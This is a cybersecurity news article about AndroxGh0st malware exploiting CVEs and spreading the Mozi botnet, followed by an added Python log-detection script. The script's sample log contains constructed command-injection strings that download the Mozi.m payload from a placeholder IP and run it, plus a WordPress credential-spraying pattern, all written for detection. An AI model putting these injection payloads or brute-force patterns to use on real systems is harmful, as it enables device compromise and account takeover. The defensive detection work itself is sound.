AndroxGh0st Malware Targets IoT with Mozi Botnet Integration
AndroxGh0st Malware Expands Attack Vector, Exploiting Critical Vulnerabilities
The AndroxGh0st malware is expanding its operations by exploiting a wide range of security vulnerabilities in internet-facing applications. Beyond its established credential-theft tooling, the malware is now also deploying the Mozi botnet. According to a recent report by CloudSEK, the combination of remote code execution and credential-stealing techniques lets AndroxGh0st maintain persistent access to compromised systems.
AndroxGh0st is a Python-based cloud attack tool that specifically targets Laravel applications. Its primary aim is to harvest credentials for services such as Amazon Web Services (AWS), SendGrid, and Twilio, typically from exposed Laravel .env files. Active since at least 2022, AndroxGh0st has previously exploited vulnerabilities in the Apache HTTP Server (CVE-2021-41773), the Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access and escalate privileges within target networks.
The Evolution of AndroxGh0st Malware
In January 2024, U.S. cybersecurity and intelligence agencies revealed that the AndroxGh0st malware is also being used to build a botnet that identifies and exploits victims within target networks. The latest findings from CloudSEK indicate a strategic expansion of the malware's targeting, with several new vulnerabilities being exploited for initial access:
- CVE-2014-2120 (CVSS score: 4.3) – Cisco ASA WebVPN login page XSS vulnerability
- CVE-2018-10561 (CVSS score: 9.8) – Dasan GPON authentication bypass vulnerability
- CVE-2018-10562 (CVSS score: 9.8) – Dasan GPON command injection vulnerability
- CVE-2021-26086 (CVSS score: 5.3) – Atlassian Jira path traversal vulnerability
- CVE-2021-41277 (CVSS score: 7.5) – Metabase GeoJSON map local file inclusion vulnerability
- CVE-2022-1040 (CVSS score: 9.8) – Sophos Firewall authentication bypass vulnerability
- CVE-2022-21587 (CVSS score: 9.8) – Oracle E-Business Suite (EBS) unauthenticated arbitrary file upload vulnerability
- CVE-2023-1389 (CVSS score: 8.8) – TP-Link Archer AX21 firmware command injection vulnerability
- CVE-2024-4577 (CVSS score: 9.8) – PHP CGI argument injection vulnerability
- CVE-2024-36401 (CVSS score: 9.8) – GeoServer remote code execution vulnerability
CloudSEK reports that AndroxGh0st also brute-forces WordPress logins, cycling through a list of common administrative usernames (admin, administrator, root, and similar) with a consistent password pattern. A successful login is redirected to the /wp-admin/ URL, the dashboard used to manage a WordPress site.
The Role of Mozi Botnet in AndroxGh0st Operations
The attacks also exploit unauthenticated command execution vulnerabilities in Netgear DGN devices and Dasan GPON home routers to fetch and run a payload named "Mozi.m" from various external servers. Mozi is known for compromising IoT devices and enrolling them in a botnet used for distributed denial-of-service (DDoS) attacks.
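The two behaviours above, the WordPress admin brute force with common usernames and a repeated password, and the command-injection requests that pull Mozi.m from an external host, both leave traces in web server and router access logs. The following is an added detection example, not CloudSEK's or the malware's code: it parses a simplified access-log format (client, timestamp, request line, status, POST body or "-") and runs both checks over constructed sample lines. The router request paths (/cgi-bin/diag.cgi, /cgi-bin/admin.cgi) and the IPs, usernames and password are placeholders, not the real Netgear DGN or Dasan GPON exploit URIs or observed credentials; only the `wget`/`curl`/`tftp` plus `Mozi.m` pattern and the /wp-login.php target are taken from the report.

```python
# Added example (not CloudSEK's or the malware's code): log-based detection of
# (1) WordPress admin credential brute forcing / password spraying against
#     /wp-login.php, and
# (2) command injection that tries to download the Mozi.m payload.
# Log lines are constructed; the router request paths are placeholders, not the
# real Netgear DGN / Dasan GPON exploit URIs.
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote_plus

# Usernames the report associates with the brute-force phase; extend as needed.
COMMON_ADMIN_USERS = {"admin", "administrator", "root", "test", "user", "wpadmin"}

# Simplified access-log format: client, timestamp, request line, status, and the
# POST body (or "-") appended as a final quoted field. Constructed for this example.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Nov/2024:10:01:02 +0000] "POST /wp-login.php HTTP/1.1" 200 "log=admin&pwd=Admin%40123"
203.0.113.7 - - [05/Nov/2024:10:01:03 +0000] "POST /wp-login.php HTTP/1.1" 200 "log=administrator&pwd=Admin%40123"
203.0.113.7 - - [05/Nov/2024:10:01:04 +0000] "POST /wp-login.php HTTP/1.1" 200 "log=root&pwd=Admin%40123"
203.0.113.7 - - [05/Nov/2024:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 302 "log=wpadmin&pwd=Admin%40123"
198.51.100.9 - - [05/Nov/2024:10:02:00 +0000] "POST /wp-login.php HTTP/1.1" 302 "log=editor&pwd=s3cret"
198.51.100.9 - - [05/Nov/2024:10:02:01 +0000] "GET /wp-admin/ HTTP/1.1" 200 "-"
192.0.2.33 - - [05/Nov/2024:10:03:00 +0000] "POST /cgi-bin/diag.cgi HTTP/1.1" 200 "action=ping&host=%60wget+http://198.51.100.200/Mozi.m+-O+/tmp/m%3Bsh+/tmp/m%60"
192.0.2.33 - - [05/Nov/2024:10:03:01 +0000] "GET /cgi-bin/admin.cgi?cmd=busybox+wget+http://198.51.100.200/Mozi.m HTTP/1.0" 200 "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) "(?P<body>[^"]*)"$'
)
# A shell download tool followed, later in the same decoded request, by Mozi.m.
MOZI_FETCH_RE = re.compile(r"\b(wget|curl|tftp)\b.*mozi\.m", re.IGNORECASE)


def parse_log(text):
    """Parse lines in the simplified format above; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def detect_wp_bruteforce(events, min_usernames=3):
    """Flag sources that try several usernames (including common admin names)
    against /wp-login.php. Returns {ip: {"usernames": [...], "passwords": [...]}}
    so a single password sprayed across many accounts is visible."""
    tried = defaultdict(lambda: {"usernames": set(), "passwords": set()})
    for e in events:
        if e["method"] != "POST" or not e["uri"].startswith("/wp-login.php"):
            continue
        form = parse_qs(e["body"])
        tried[e["ip"]]["usernames"].add(form.get("log", [""])[0].lower())
        tried[e["ip"]]["passwords"].add(form.get("pwd", [""])[0])
    hits = {}
    for ip, seen in tried.items():
        if len(seen["usernames"]) >= min_usernames and seen["usernames"] & COMMON_ADMIN_USERS:
            hits[ip] = {"usernames": sorted(seen["usernames"]),
                        "passwords": sorted(seen["passwords"])}
    return hits


def detect_mozi_fetch(events):
    """Flag requests whose decoded URI or body carries a download command for
    Mozi.m, regardless of which device endpoint the injection goes through."""
    hits = []
    for e in events:
        decoded = unquote_plus(e["uri"]) + " " + unquote_plus(e["body"])
        if MOZI_FETCH_RE.search(decoded):
            hits.append((e["ip"], e["uri"]))
    return hits


if __name__ == "__main__":
    evts = parse_log(SAMPLE_LOG)
    for ip, info in detect_wp_bruteforce(evts).items():
        print(f"[wp-login brute force] {ip}: users={info['usernames']} passwords={info['passwords']}")
    for ip, uri in detect_mozi_fetch(evts):
        print(f"[Mozi.m fetch] {ip} -> {uri}")
```

Against the constructed sample, the first detector reports 203.0.113.7 for trying four usernames with one password, while the single legitimate editor login from 198.51.100.9 is not flagged; the second reports both 192.0.2.33 requests because it matches on the decoded payload rather than on a specific device URI. Real deployments should also decode the request body only when the server logs it, and tune `min_usernames` and the window against the site's normal login traffic.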
Although Mozi's creators were arrested by Chinese law enforcement in September 2021, Mozi activity only dropped sharply in August 2023, after a kill-switch command shut the malware down. It is suspected that either the botnet's creators or Chinese authorities issued that command.
The integration of Mozi into AndroxGh0st points to an operational alliance that broadens the range of devices the malware can infect. CloudSEK notes, "AndroxGh0st is not just collaborating with Mozi but embedding its specific functionalities into its standard operations." Such a pairing would give one operator control over a far larger pool of devices, amplifying the effectiveness of both botnets.
Conclusion: Stay Informed and Secure
AndroxGh0st's expanding exploit list and its integration with the Mozi botnet underscore the need for basic but consistent defenses: patch the vulnerabilities listed above on internet-facing systems, harden administrative logins (including WordPress and router interfaces) against credential brute forcing, and watch for outbound fetches of payloads such as Mozi.m from exposed devices.